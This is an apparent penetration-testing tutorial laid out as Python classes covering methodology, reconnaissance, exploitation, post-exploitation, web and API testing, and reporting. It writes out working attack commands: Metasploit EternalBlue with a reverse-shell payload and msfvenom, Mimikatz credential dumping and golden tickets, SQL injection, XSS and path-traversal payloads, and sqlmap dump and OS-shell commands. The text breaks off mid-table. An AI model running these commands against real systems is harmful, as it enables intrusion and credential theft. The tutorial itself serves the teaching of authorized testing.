Introduction to Penetration Testing
Penetration testing (pen testing) is a controlled simulated cyber attack against a computer system, network, or web application to identify security vulnerabilities that an attacker could exploit. It's a critical component of any organization's security program, providing real-world insights into security posture and helping prioritize remediation efforts.
Key Concepts
- Penetration Testing: Authorized simulated attacks to identify vulnerabilities
- Vulnerability Assessment: Automated scanning to identify known vulnerabilities
- Red Team: Offensive security team simulating adversaries
- Blue Team: Defensive security team protecting assets
- Purple Team: Collaborative approach combining red and blue teams
- Attack Vector: The path or means by which an attacker gains access
1. Penetration Testing Overview
Types of Penetration Testing
class PenTestTypes:
"""Classification of penetration testing types"""
test_types = {
"Black Box": {
"Description": "No prior knowledge of the target system",
"Approach": "Simulates external attacker with no internal knowledge",
"Pros": "Realistic external attacker simulation",
"Cons": "Time-consuming, may miss internal vulnerabilities",
"When to Use": "External-facing applications, third-party testing"
},
"White Box": {
"Description": "Full knowledge of target system (source code, architecture)",
"Approach": "In-depth testing with internal knowledge",
"Pros": "Comprehensive coverage, efficient",
"Cons": "May not simulate real attacker knowledge level",
"When to Use": "Critical applications, compliance requirements"
},
"Gray Box": {
"Description": "Limited knowledge (credentials, API documentation)",
"Approach": "Simulates insider threat or compromised user",
"Pros": "Balanced approach, realistic insider threat",
"Cons": "Requires careful scope definition",
"When to Use": "Web applications, API testing"
}
}
def display(self):
for test_type, details in self.test_types.items():
print(f"\n{'='*55}")
print(f"{test_type.upper()} BOX TESTING")
print(f"{details['Description']}")
print(f"Approach: {details['Approach']}")
print(f"✓ {details['Pros']}")
print(f"✗ {details['Cons']}")
print(f"📌 {details['When to Use']}")
pen_types = PenTestTypes()
pen_types.display()
Testing Methodologies
class TestingMethodologies:
"""Penetration testing frameworks and standards"""
methodologies = {
"PTES (Penetration Testing Execution Standard)": {
"Phases": [
"Pre-engagement Interactions",
"Intelligence Gathering",
"Threat Modeling",
"Vulnerability Analysis",
"Exploitation",
"Post-Exploitation",
"Reporting"
],
"Focus": "Comprehensive methodology covering all aspects"
},
"OWASP Testing Guide": {
"Focus": "Web application security",
"Sections": [
"Information Gathering",
"Configuration Testing",
"Identity Management",
"Authentication Testing",
"Authorization Testing",
"Session Management",
"Input Validation",
"Error Handling",
"Cryptography",
"Business Logic",
"Client-side Testing"
]
},
"NIST SP 800-115": {
"Focus": "Technical guide to information security testing",
"Phases": [
"Planning",
"Discovery",
"Attack",
"Reporting"
]
},
"OSSTMM (Open Source Security Testing Methodology Manual)": {
"Focus": "Operational security metrics",
"Modules": [
"Scope Definition",
"Channel Testing",
"Controls Testing",
"Process Testing"
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING METHODOLOGIES")
print("="*55)
for methodology, details in self.methodologies.items():
print(f"\n📋 {methodology}")
if 'Phases' in details:
print("\nPhases:")
for phase in details['Phases'][:5]:
print(f" • {phase}")
if len(details['Phases']) > 5:
print(f" • ... +{len(details['Phases'])-5} more phases")
if 'Focus' in details:
print(f"\nFocus: {details['Focus']}")
methodologies = TestingMethodologies()
methodologies.display()
2. Penetration Testing Lifecycle
Phase 1: Pre-engagement
class PreEngagement:
"""Pre-engagement phase activities"""
def __init__(self):
self.elements = {
"Scope Definition": {
"Questions": [
"What systems are in scope?",
"What IP ranges?",
"What domains?",
"What applications?",
"What testing types? (internal/external/web/mobile)"
],
"Outcome": "Clear scope document"
},
"Rules of Engagement": {
"Elements": [
"Testing window/timeline",
"Allowed attack vectors",
"Social engineering permitted?",
"Physical testing permitted?",
"Emergency contact procedures"
],
"Outcome": "Signed ROE document"
},
"Goals and Objectives": {
"Elements": [
"Find critical vulnerabilities",
"Test specific controls",
"Achieve domain admin",
"Access sensitive data",
"Compliance requirements"
],
"Outcome": "Defined success criteria"
},
"Legal Authorization": {
"Documents": [
"Signed authorization letter",
"Third-party authorization (cloud providers)",
"Insurance coverage",
"Data handling agreements"
],
"Outcome": "Legal protection for testers"
}
}
def display(self):
print("\n" + "="*55)
print("PRE-ENGAGEMENT PHASE")
print("="*55)
for element, details in self.elements.items():
print(f"\n📄 {element}")
if 'Questions' in details:
print("\nKey Questions:")
for q in details['Questions'][:4]:
print(f" • {q}")
if 'Elements' in details:
print("\nElements:")
for elem in details['Elements']:
print(f" • {elem}")
print(f"\nOutcome: {details['Outcome']}")
def generate_scope_document(self):
"""Generate sample scope document template"""
print("\n" + "="*55)
print("SCOPE DOCUMENT TEMPLATE")
print("="*55)
scope_template = """
PENETRATION TEST SCOPE DOCUMENT
================================
1. CLIENT INFORMATION
• Organization: _____________
• Contact Person: _____________
• Email/Phone: _____________
2. TEST SCOPE
• Internal IP Ranges: _____________
• External IP Ranges: _____________
• Domains: _____________
• Applications: _____________
• APIs: _____________
3. TEST TYPES
[ ] External Network
[ ] Internal Network
[ ] Web Application
[ ] Mobile Application
[ ] Wireless
[ ] Physical
[ ] Social Engineering
4. TESTING WINDOW
• Start Date: _____________
• End Date: _____________
• Testing Hours: _____________
5. RULES OF ENGAGEMENT
• Allowed Techniques: _____________
• Prohibited Actions: _____________
• Emergency Stop Procedures: _____________
6. SUCCESS CRITERIA
• _____________
• _____________
• _____________
7. AUTHORIZATION
• Authorized By: _____________
• Signature: _____________
• Date: _____________
"""
print(scope_template)
pre_engage = PreEngagement()
pre_engage.display()
pre_engage.generate_scope_document()
Phase 2: Intelligence Gathering (Reconnaissance)
class IntelligenceGathering:
"""Passive and active reconnaissance techniques"""
def __init__(self):
self.techniques = {
"Passive Reconnaissance": {
"Description": "Gather information without directly interacting with target",
"Sources": [
"DNS records (whois, dig)",
"Search engines (Google dorks)",
"Social media",
"Job postings",
"Code repositories (GitHub)",
"Shodan/Censys",
"Certificate transparency logs"
],
"Tools": ["theHarvester", "recon-ng", "Maltego", "Shodan"],
"Output": [
"Email addresses",
"Domain names",
"Employee names",
"Technology stack"
]
},
"Active Reconnaissance": {
"Description": "Direct interaction with target systems",
"Techniques": [
"Port scanning (nmap)",
"Service enumeration",
"OS fingerprinting",
"Banner grabbing",
"DNS enumeration"
],
"Tools": ["nmap", "masscan", "zmap", "dnsrecon"],
"Risks": "May trigger IDS/IPS alerts"
},
"OSINT (Open Source Intelligence)": {
"Description": "Publicly available information gathering",
"Sources": [
"Google dorks",
"Wayback Machine",
"Public records",
"LinkedIn/GitHub",
"Crunchbase"
],
"Google Dorks Examples": [
"site:target.com filetype:pdf",
"intitle:\"index of\"",
"inurl:admin",
"ext:conf | ext:cnf"
]
}
}
def display(self):
print("\n" + "="*55)
print("INTELLIGENCE GATHERING (RECONNAISSANCE)")
print("="*55)
for technique, details in self.techniques.items():
print(f"\n🔍 {technique}")
print(f"{details['Description']}")
if 'Sources' in details:
print("\nSources:")
for source in details['Sources'][:4]:
print(f" • {source}")
if 'Tools' in details:
print(f"\nTools: {', '.join(details['Tools'])}")
if 'Output' in details:
print("\nOutput:")
for out in details['Output']:
print(f" → {out}")
def google_dorks_examples(self):
"""Google dork examples for OSINT"""
print("\n" + "="*55)
print("GOOGLE DORKS (OSINT)")
print("="*55)
dorks = """
FILE SEARCH:
• site:target.com filetype:pdf
• intitle:"index of" "backup"
• filetype:sql intext:password
SENSITIVE INFORMATION:
• intitle:"admin" inurl:login
• intext:"powered by WordPress"
• "API key" site:github.com
CONFIGURATION FILES:
• ext:conf | ext:cnf | ext:ini
• ext:log "password"
• inurl:phpinfo.php
DIRECTORY LISTINGS:
• intitle:"index of" "parent directory"
• intitle:"Directory listing for"
ERROR MESSAGES:
• "Warning: mysql_connect()"
• "ORA-00942: table or view does not exist"
• "Error: SQLSTATE[HY000]"
"""
print(dorks)
recon = IntelligenceGathering()
recon.display()
recon.google_dorks_examples()
Phase 3: Vulnerability Analysis
class VulnerabilityAnalysis:
"""Identifying and analyzing vulnerabilities"""
def __init__(self):
self.analysis_types = {
"Automated Scanning": {
"Purpose": "Identify known vulnerabilities",
"Tools": [
"Nessus",
"OpenVAS",
"Qualys",
"Nexpose"
],
"Advantages": "Fast, comprehensive coverage",
"Limitations": "False positives, cannot test business logic"
},
"Manual Analysis": {
"Purpose": "Validate findings, identify logic flaws",
"Activities": [
"Configuration review",
"Code review",
"Business logic testing",
"Authentication bypass attempts"
],
"Advantages": "Finds unique vulnerabilities",
"Limitations": "Time-consuming, requires expertise"
},
"Vulnerability Classification": {
"Frameworks": [
"CVSS (Common Vulnerability Scoring System)",
"CWE (Common Weakness Enumeration)",
"CVE (Common Vulnerabilities and Exposures)"
],
"Risk Ratings": [
"Critical (CVSS 9.0-10.0)",
"High (CVSS 7.0-8.9)",
"Medium (CVSS 4.0-6.9)",
"Low (CVSS 0.1-3.9)",
"Informational"
]
}
}
def display(self):
print("\n" + "="*55)
print("VULNERABILITY ANALYSIS")
print("="*55)
for analysis_type, details in self.analysis_types.items():
print(f"\n🔧 {analysis_type}")
print(f"Purpose: {details['Purpose']}")
if 'Tools' in details:
print(f"Tools: {', '.join(details['Tools'])}")
if 'Activities' in details:
print("\nActivities:")
for activity in details['Activities']:
print(f" • {activity}")
print(f"✓ {details['Advantages']}")
print(f"✗ {details['Limitations']}")
def cvss_score_explanation(self):
"""CVSS v3.1 score explanation"""
print("\n" + "="*55)
print("CVSS SCORE CALCULATION")
print("="*55)
print("""
CVSS v3.1 Base Metrics:
┌─────────────────────────────────────────────────────────────┐
│ Attack Vector (AV) │
│ • Network (N): Remotely exploitable │
│ • Adjacent (A): Same network segment │
│ • Local (L): Requires local access │
│ • Physical (P): Requires physical access │
├─────────────────────────────────────────────────────────────┤
│ Attack Complexity (AC) │
│ • Low (L): Easily exploitable │
│ • High (H): Requires specialized conditions │
├─────────────────────────────────────────────────────────────┤
│ Privileges Required (PR) │
│ • None (N): No authentication required │
│ • Low (L): Basic user privileges │
│ • High (H): Admin/root privileges │
├─────────────────────────────────────────────────────────────┤
│ User Interaction (UI) │
│ • None (N): No user interaction required │
│ • Required (R): Requires user action │
├─────────────────────────────────────────────────────────────┤
│ Scope (S) │
│ • Unchanged (U): Impact confined to vulnerable component │
│ • Changed (C): Impact affects other components │
├─────────────────────────────────────────────────────────────┤
│ Impact Metrics (CIA) │
│ • Confidentiality (C): High/Low/None │
│ • Integrity (I): High/Low/None │
│ • Availability (A): High/Low/None │
└─────────────────────────────────────────────────────────────┘
CVSS Score Example:
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 (Critical)
""")
vuln_analysis = VulnerabilityAnalysis()
vuln_analysis.display()
vuln_analysis.cvss_score_explanation()
Phase 4: Exploitation
class Exploitation:
"""Exploitation phase techniques"""
def __init__(self):
self.exploitation_categories = {
"Network Exploitation": {
"Examples": [
"Exploiting unpatched services",
"Password attacks (brute force, spraying)",
"Man-in-the-middle attacks",
"ARP spoofing",
"DNS hijacking"
],
"Tools": ["Metasploit", "Hydra", "Responder", "Bettercap"]
},
"Web Application Exploitation": {
"OWASP Top 10": [
"SQL Injection",
"Cross-Site Scripting (XSS)",
"Broken Authentication",
"Sensitive Data Exposure",
"XML External Entities (XXE)",
"Security Misconfiguration",
"Cross-Site Request Forgery (CSRF)",
"Insecure Deserialization",
"Using Components with Known Vulnerabilities",
"Insufficient Logging & Monitoring"
],
"Tools": ["Burp Suite", "OWASP ZAP", "SQLmap", "Nuclei"]
},
"Privilege Escalation": {
"Techniques": [
"Kernel exploits",
"Misconfigured sudo",
"SUID binaries",
"Cron jobs",
"Service misconfigurations",
"Docker breakout"
],
"Tools": ["LinPEAS", "WinPEAS", "PowerUp", "Sherlock"]
},
"Post-Exploitation": {
"Activities": [
"Lateral movement",
"Persistence establishment",
"Data exfiltration",
"Credential dumping",
"Pivoting"
],
"Tools": ["Mimikatz", "Impacket", "Cobalt Strike", "Empire"]
}
}
def display(self):
print("\n" + "="*55)
print("EXPLOITATION PHASE")
print("="*55)
for category, details in self.exploitation_categories.items():
print(f"\n⚡ {category}")
if 'Examples' in details:
print("\nExamples:")
for ex in details['Examples'][:5]:
print(f" • {ex}")
if 'OWASP Top 10' in details:
print("\nOWASP Top 10:")
for vuln in details['OWASP Top 10'][:5]:
print(f" • {vuln}")
print(f" • ... +{len(details['OWASP Top 10'])-5} more")
if 'Techniques' in details:
print("\nTechniques:")
for tech in details['Techniques'][:5]:
print(f" • {tech}")
print(f"\nTools: {', '.join(details['Tools'])}")
def metasploit_examples(self):
"""Metasploit framework examples"""
print("\n" + "="*55)
print("METASPLOIT FRAMEWORK EXAMPLES")
print("="*55)
examples = """
# Start Metasploit
msfconsole
# Search for modules
search type:exploit name:smb
search cve:2021
# Use exploit module
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
# Run exploit
run
# Post-exploitation (Meterpreter)
sysinfo
getuid
hashdump
screenshot
download C:\\secret\\data.txt
upload /tmp/backdoor.exe
shell
# Auxiliary modules
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 1-1000
run
# Payload generation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe
"""
print(examples)
exploitation = Exploitation()
exploitation.display()
exploitation.metasploit_examples()
Phase 5: Post-Exploitation
class PostExploitation:
"""Post-exploitation activities"""
def __init__(self):
self.activities = {
"Lateral Movement": {
"Techniques": [
"Pass the hash",
"Pass the ticket",
"PSExec/WMI",
"RDP hopping",
"SSH key harvesting"
],
"Tools": ["Impacket", "CrackMapExec", "BloodHound"],
"Goal": "Expand access across network"
},
"Persistence": {
"Techniques": [
"Registry run keys",
"Scheduled tasks",
"Startup folder",
"Service creation",
"WMI event subscription",
"Web shells"
],
"Goal": "Maintain access after reboot"
},
"Credential Harvesting": {
"Sources": [
"SAM hive",
"LSASS memory",
"Kerberos tickets",
"Browser saved passwords",
"SSH keys",
"Configuration files"
],
"Tools": ["Mimikatz", "LaZagne", "SecretsDump"],
"Goal": "Obtain credentials for further access"
},
"Data Exfiltration": {
"Methods": [
"Encrypted channels",
"DNS tunneling",
"HTTP/S POST",
"ICMP tunneling",
"Cloud storage upload"
],
"Tools": ["curl", "scp", "dnscat2", "iodine"],
"Goal": "Extract sensitive data"
},
"Pivoting": {
"Techniques": [
"Port forwarding",
"SOCKS proxy",
"SSH tunneling",
"Metasploit pivoting",
"VPN pivoting"
],
"Goal": "Access internal networks"
}
}
def display(self):
print("\n" + "="*55)
print("POST-EXPLOITATION ACTIVITIES")
print("="*55)
for activity, details in self.activities.items():
print(f"\n🔓 {activity}")
if 'Techniques' in details:
print("\nTechniques:")
for tech in details['Techniques'][:5]:
print(f" • {tech}")
if 'Sources' in details:
print("\nSources:")
for source in details['Sources'][:5]:
print(f" • {source}")
print(f"\nTools: {', '.join(details['Tools'])}")
print(f"Goal: {details['Goal']}")
def mimikatz_commands(self):
"""Mimikatz command examples"""
print("\n" + "="*55)
print("MIKIKATZ COMMAND EXAMPLES")
print("="*55)
commands = """
# Run Mimikatz
mimikatz
# Privilege escalation
privilege::debug
# Dump credentials
sekurlsa::logonpasswords
sekurlsa::tickets
sekurlsa::kerberos
# Pass-the-hash
sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<hash>
# Golden ticket
kerberos::golden /user:Administrator /domain:target.local /sid:<SID> /krbtgt:<hash> /id:500
# Dump LSASS
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
# DPCAPI data
dpapi::masterkey /in:"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Protect\\<SID>\\<file>" /rpc
"""
print(commands)
post_exploit = PostExploitation()
post_exploit.display()
post_exploit.mimikatz_commands()
3. Web Application Penetration Testing
OWASP Top 10 Deep Dive
class OWASPTesting:
"""OWASP Top 10 testing techniques"""
def __init__(self):
self.owasp_vulnerabilities = {
"SQL Injection": {
"Description": "Insert SQL code into application queries",
"Testing Techniques": [
"Error-based injection",
"Union-based injection",
"Blind boolean-based injection",
"Time-based blind injection"
],
"Tools": ["SQLmap", "Burp Suite Intruder"],
"Test Payloads": [
"' OR '1'='1",
"' UNION SELECT username,password FROM users--",
"admin'--",
"'; DROP TABLE users;--"
]
},
"Cross-Site Scripting (XSS)": {
"Description": "Inject malicious scripts into web pages",
"Types": [
"Reflected XSS",
"Stored XSS",
"DOM-based XSS"
],
"Test Payloads": [
"<script>alert('XSS')</script>",
"javascript:alert('XSS')",
"<img src=x onerror=alert('XSS')>",
"';alert(String.fromCharCode(88,83,83))//"
],
"Tools": ["XSSer", "XSStrike", "Burp Suite"]
},
"Authentication Testing": {
"Techniques": [
"Username enumeration",
"Password spraying",
"Brute force attacks",
"Session fixation",
"Weak password policy testing"
],
"Tools": ["Hydra", "Medusa", "Patator"],
"Common Weaknesses": [
"Default credentials",
"No account lockout",
"Weak password complexity",
"No MFA"
]
},
"Authorization Testing": {
"Techniques": [
"IDOR (Insecure Direct Object References)",
"Privilege escalation",
"Parameter tampering",
"Path traversal"
],
"Test Cases": [
"Modify user ID in request",
"Access admin endpoints",
"Change role parameter",
"../../../etc/passwd"
]
}
}
def display(self):
print("\n" + "="*55)
print("OWASP TOP 10 TESTING TECHNIQUES")
print("="*55)
for vuln, details in self.owasp_vulnerabilities.items():
print(f"\n🔓 {vuln}")
print(f"{details['Description']}")
if 'Types' in details:
print(f"\nTypes: {', '.join(details['Types'])}")
print("\nTesting Techniques:")
for tech in details['Testing Techniques'][:3]:
print(f" • {tech}")
print("\nTools:")
for tool in details['Tools']:
print(f" • {tool}")
def sqlmap_examples(self):
"""SQLmap tool examples"""
print("\n" + "="*55)
print("SQLMAP EXAMPLES")
print("="*55)
examples = """
# Basic SQL injection detection
sqlmap -u "http://target.com/page.php?id=1"
# POST request injection
sqlmap -u "http://target.com/login.php" --data="username=admin&password=pass"
# Enumerate databases
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Enumerate tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
# Enumerate columns
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns
# Dump data
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
# Level and risk settings
sqlmap -u "http://target.com/page.php?id=1" --level=5 --risk=3
# Use tamper scripts
sqlmap -u "http://target.com/page.php?id=1" --tamper=space2comment
# Get OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell
"""
print(examples)
owasp = OWASPTesting()
owasp.display()
owasp.sqlmap_examples()
API Penetration Testing
class APIPenetrationTesting:
"""API security testing techniques"""
def __init__(self):
self.api_tests = {
"Authentication Testing": {
"Methods": [
"API key leakage",
"JWT token testing",
"OAuth 2.0 flaws",
"Basic auth brute force"
],
"Test Cases": [
"Missing authentication",
"Weak JWT secrets",
"Token replay",
"Token expiration bypass"
],
"Tools": ["Postman", "Burp Suite", "JWT_tool"]
},
"Injection Testing": {
"Types": [
"NoSQL injection",
"SQL injection in APIs",
"Command injection",
"LDAP injection"
],
"Tools": ["NoSQLmap", "SQLmap", "Postman"]
},
"Rate Limiting": {
"Techniques": [
"Brute force protection bypass",
"Rate limit enumeration",
"Race conditions"
],
"Tools": ["Burp Intruder", "ffuf", "wrk"]
},
"GraphQL Testing": {
"Techniques": [
"Introspection queries",
"Field duplication",
"Batch queries",
"Deep recursion"
],
"Tools": ["GraphQL Voyager", "GraphQL Playground", "InQL"]
}
}
def display(self):
print("\n" + "="*55)
print("API PENETRATION TESTING")
print("="*55)
for test_type, details in self.api_tests.items():
print(f"\n📡 {test_type}")
if 'Methods' in details:
print("\nMethods:")
for method in details['Methods']:
print(f" • {method}")
if 'Test Cases' in details:
print("\nTest Cases:")
for test in details['Test Cases']:
print(f" • {test}")
print(f"\nTools: {', '.join(details['Tools'])}")
def jwt_attacks(self):
"""JWT token testing techniques"""
print("\n" + "="*55)
print("JWT ATTACK TECHNIQUES")
print("="*55)
attacks = """
JWT Structure:
Header: {"alg":"HS256","typ":"JWT"}
Payload: {"sub":"user","exp":1234567890}
Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
Common Attacks:
┌─────────────────────────────────────────────────────────────┐
│ 1. None Algorithm Attack │
│ • Change alg to "none" │
│ • Remove signature │
│ • Tool: jwt_tool -X a │
├─────────────────────────────────────────────────────────────┤
│ 2. Weak Secret Brute Force │
│ • Crack JWT secret using wordlist │
│ • Tool: jwt_tool -C /usr/share/wordlists/rockyou.txt │
├─────────────────────────────────────────────────────────────┤
│ 3. Algorithm Confusion │
│ • Change alg from RS256 to HS256 │
│ • Use public key as symmetric key │
│ • Tool: jwt_tool -X k │
├─────────────────────────────────────────────────────────────┤
│ 4. Kid Injection │
│ • Manipulate "kid" header parameter │
│ • Path traversal, SQL injection │
│ • Tool: jwt_tool -X i │
├─────────────────────────────────────────────────────────────┤
│ 5. Claim Manipulation │
│ • Modify exp, iat, nbf │
│ • Escalate privileges │
│ • Tool: jwt_tool -X e │
└─────────────────────────────────────────────────────────────┘
JWT Testing Tools:
• jwt_tool - Comprehensive JWT testing
• Burp Suite JWT Editor - Burp extension
• jsonwebtoken - Node.js library for testing
"""
print(attacks)
api_test = APIPenetrationTesting()
api_test.display()
api_test.jwt_attacks()
4. Network Penetration Testing
Network Scanning Techniques
class NetworkPenTesting:
"""Network penetration testing techniques"""
def __init__(self):
self.network_tests = {
"Port Scanning": {
"Techniques": [
"TCP SYN scan (-sS) - Stealth",
"TCP Connect scan (-sT)",
"UDP scan (-sU)",
"FIN scan (-sF)",
"XMAS scan (-sX)",
"NULL scan (-sN)"
],
"Tools": ["nmap", "masscan", "zmap"],
"Example": "nmap -sS -p- -T4 192.168.1.0/24"
},
"Service Enumeration": {
"Techniques": [
"Version detection (-sV)",
"OS detection (-O)",
"Script scanning (-sC)",
"Aggressive scan (-A)"
],
"Tools": ["nmap", "amap", "nc"],
"Example": "nmap -sV -sC -p 80,443 192.168.1.1"
},
"Vulnerability Scanning": {
"Tools": ["Nessus", "OpenVAS", "Nuclei"],
"Example": "nessuscli scan --target 192.168.1.0/24"
}
}
def display(self):
print("\n" + "="*55)
print("NETWORK PENETRATION TESTING")
print("="*55)
for test_type, details in self.network_tests.items():
print(f"\n🌐 {test_type}")
if 'Techniques' in details:
print("\nTechniques:")
for tech in details['Techniques'][:5]:
print(f" • {tech}")
print(f"\nTools: {', '.join(details['Tools'])}")
if 'Example' in details:
print(f"\nExample: {details['Example']}")
def nmap_advanced_scanning(self):
"""Advanced Nmap scanning techniques"""
print("\n" + "="*55)
print("ADVANCED NMAP SCANNING")
print("="*55)
scans = """
SCAN TYPES:
• TCP SYN scan (default): nmap -sS target
• UDP scan: nmap -sU target
• FIN scan (stealth): nmap -sF target
• NULL scan: nmap -sN target
• XMAS scan: nmap -sX target
• Idle scan (zombie): nmap -sI zombie target
TIMING TEMPLATES:
• -T0 (Paranoid): Very slow, IDS evasion
• -T1 (Sneaky): Slow, IDS evasion
• -T2 (Polite): Slow, less bandwidth
• -T3 (Normal): Default
• -T4 (Aggressive): Fast, assumes good network
• -T5 (Insane): Very fast, may miss ports
SCRIPT SCANNING:
• Default scripts: nmap -sC target
• Specific script: nmap --script http-enum target
• Script categories: nmap --script vuln target
• Custom script: nmap --script ./myscript.nse target
OUTPUT FORMATS:
• Normal: nmap -oN output.txt target
• XML: nmap -oX output.xml target
• Grepable: nmap -oG output.gnmap target
• All formats: nmap -oA output target
EVASION TECHNIQUES:
• Decoy: nmap -D RND:10 target
• Fragment packets: nmap -f target
• Source port: nmap -g 53 target
• MTU: nmap --mtu 24 target
"""
print(scans)
network_pen = NetworkPenTesting()
network_pen.display()
network_pen.nmap_advanced_scanning()
5. Reporting
Penetration Test Report Structure
class PenTestReporting:
"""Penetration test report structure and content"""
def __init__(self):
self.report_sections = {
"Executive Summary": {
"Content": [
"Overall security posture",
"Key findings summary",
"Risk rating overview",
"Remediation timeline",
"Strategic recommendations"
],
"Audience": "Senior management, executives"
},
"Technical Summary": {
"Content": [
"Scope and methodology",
"Testing timeline",
"Tools used",
"Successes and limitations",
"Attack narrative"
],
"Audience": "Technical management"
},
"Findings": {
"Structure": [
"Vulnerability title",
"Risk rating (CVSS score)",
"Description",
"Affected assets",
"Proof of concept",
"Impact analysis",
"Remediation steps",
"References"
]
},
"Remediation": {
"Content": [
"Prioritized remediation plan",
"Short-term fixes",
"Long-term improvements",
"Verification steps",
"Timeline estimates"
]
},
"Appendix": {
"Content": [
"Raw scan results",
"Exploit code used",
"Configuration files",
"Network diagrams",
"Glossary"
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TEST REPORT STRUCTURE")
print("="*55)
for section, details in self.report_sections.items():
print(f"\n📋 {section}")
print(f"Audience: {details['Audience'] if 'Audience' in details else 'Technical staff'}")
print("Content:")
for content in details['Content'][:5]:
print(f" • {content}")
def create_finding_template(self):
"""Create finding template"""
print("\n" + "="*55)
print("FINDING TEMPLATE")
print("="*55)
template = """
FINDING: [Vulnerability Title]
================================
| Field | Value |
|-------|-------|
| Risk Rating | [Critical/High/Medium/Low] |
| CVSS Score | [0.0-10.0] |
| Affected Assets | [IP/hostname/application] |
| Discovered | [Date] |
| Status | [New/In Progress/Fixed/False Positive] |
DESCRIPTION:
[Detailed description of the vulnerability]
PROOF OF CONCEPT:
[Actual exploit code or steps to reproduce]
IMPACT:
[Business and technical impact of exploitation]
RECOMMENDATION:
[Specific steps to remediate]
REFERENCES:
[CVEs, CWE, OWASP, external resources]
"""
print(template)
def remediation_prioritization(self):
"""Remediation prioritization framework"""
print("\n" + "="*55)
print("REMEDIATION PRIORITIZATION")
print("="*55)
prioritization = """
PRIORITIZATION MATRIX:
┌─────────────────────────────────────────────┐
│ IMPACT │
├───────────┬───────────┬───────────────────┤
│ Critical │ High │ Medium/Low │
┌───────────┬──────┼───────────┼───────────┼───────────────────┤
│ │ High │ 1 │ 2 │ 3 │
│ LIKELI- ├──────┼───────────┼───────────┼───────────────────┤
│ HOOD │ Med │ 2 │ 3 │ 4 │
│ ├──────┼───────────┼───────────┼───────────────────┤
│ │ Low │ 3 │ 4 │ 5 │
└───────────┴──────┴───────────┴───────────┴───────────────────┘
PRIORITY LEVELS:
┌─────────────────────────────────────────────────────────────┐
│ Priority 1: CRITICAL │
│ • Immediate remediation (within 24-48 hours) │
│ • Business impact: Severe │
│ • Examples: Remote code execution, domain admin compromise │
├─────────────────────────────────────────────────────────────┤
│ Priority 2: HIGH │
│ • Remediate within 1-2 weeks │
│ • Business impact: Significant │
│ • Examples: SQL injection, privilege escalation │
├─────────────────────────────────────────────────────────────┤
│ Priority 3: MEDIUM │
│ • Remediate within 1 month │
│ • Business impact: Moderate │
│ • Examples: Information disclosure, weak cryptography │
├─────────────────────────────────────────────────────────────┤
│ Priority 4: LOW │
│ • Remediate within 3-6 months │
│ • Business impact: Minor │
│ • Examples: Information disclosure, best practice issues │
├─────────────────────────────────────────────────────────────┤
│ Priority 5: INFORMATIONAL │
│ • No immediate remediation required │
│ • Business impact: None │
│ • Examples: Recommendations, hardening opportunities │
└─────────────────────────────────────────────────────────────┘
"""
print(prioritization)
reporting = PenTestReporting()
reporting.display()
reporting.create_finding_template()
reporting.remediation_prioritization()
6. Penetration Testing Tools
Essential Tool Categories
class PenTestTools:
"""Penetration testing tool categories"""
def __init__(self):
self.tool_categories = {
"Information Gathering": {
"Tools": [
"nmap - Network scanning",
"theHarvester - Email/Domain enumeration",
"Shodan - IoT/Device search",
"Maltego - OSINT analysis",
"Burp Suite - Web application proxy"
]
},
"Vulnerability Scanning": {
"Tools": [
"Nessus - Comprehensive scanner",
"OpenVAS - Open source scanner",
"Nuclei - Template-based scanner",
"Nikto - Web server scanner"
]
},
"Exploitation": {
"Tools": [
"Metasploit - Exploitation framework",
"SQLmap - SQL injection",
"Hydra - Password cracking",
"John the Ripper - Password cracking"
]
},
"Web Application": {
"Tools": [
"Burp Suite - Web proxy",
"OWASP ZAP - Web scanner",
"FFUF - Fuzzing tool",
"XSStrike - XSS scanner"
]
},
"Post-Exploitation": {
"Tools": [
"Mimikatz - Credential theft",
"Impacket - Network protocols",
"Cobalt Strike - Adversary simulation",
"PowerShell Empire - Post-exploitation"
]
},
"Wireless": {
"Tools": [
"Aircrack-ng - WiFi cracking",
"Kismet - Wireless detector",
"Reaver - WPS attack",
"Wifite - Automated wireless attacks"
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING TOOLS")
print("="*55)
for category, details in self.tool_categories.items():
print(f"\n🔧 {category}")
for tool in details['Tools']:
print(f" • {tool}")
def kali_linux_tools(self):
"""Kali Linux tool categories"""
print("\n" + "="*55)
print("KALI LINUX TOOL CATEGORIES")
print("="*55)
kali_categories = """
┌─────────────────────────────────────────────────────────────┐
│ 01 - Information Gathering │
│ dnsrecon, theHarvester, recon-ng, maltego │
├─────────────────────────────────────────────────────────────┤
│ 02 - Vulnerability Analysis │
│ nmap, nessus, openvas, nikto │
├─────────────────────────────────────────────────────────────┤
│ 03 - Web Application Analysis │
│ burpsuite, owasp-zap, sqlmap, wpscan │
├─────────────────────────────────────────────────────────────┤
│ 04 - Database Assessment │
│ sqlmap, sqlninja, sqlsus │
├─────────────────────────────────────────────────────────────┤
│ 05 - Password Attacks │
│ hydra, john, crunch, hashcat │
├─────────────────────────────────────────────────────────────┤
│ 06 - Wireless Attacks │
│ aircrack-ng, kismet, wifite, reaver │
├─────────────────────────────────────────────────────────────┤
│ 07 - Reverse Engineering │
│ ghidra, radare2, apktool │
├─────────────────────────────────────────────────────────────┤
│ 08 - Exploitation Tools │
│ metasploit, searchsploit, beef │
├─────────────────────────────────────────────────────────────┤
│ 09 - Sniffing & Spoofing │
│ wireshark, tcpdump, bettercap, responder │
├─────────────────────────────────────────────────────────────┤
│ 10 - Post Exploitation │
│ mimikatz, powersploit, empire │
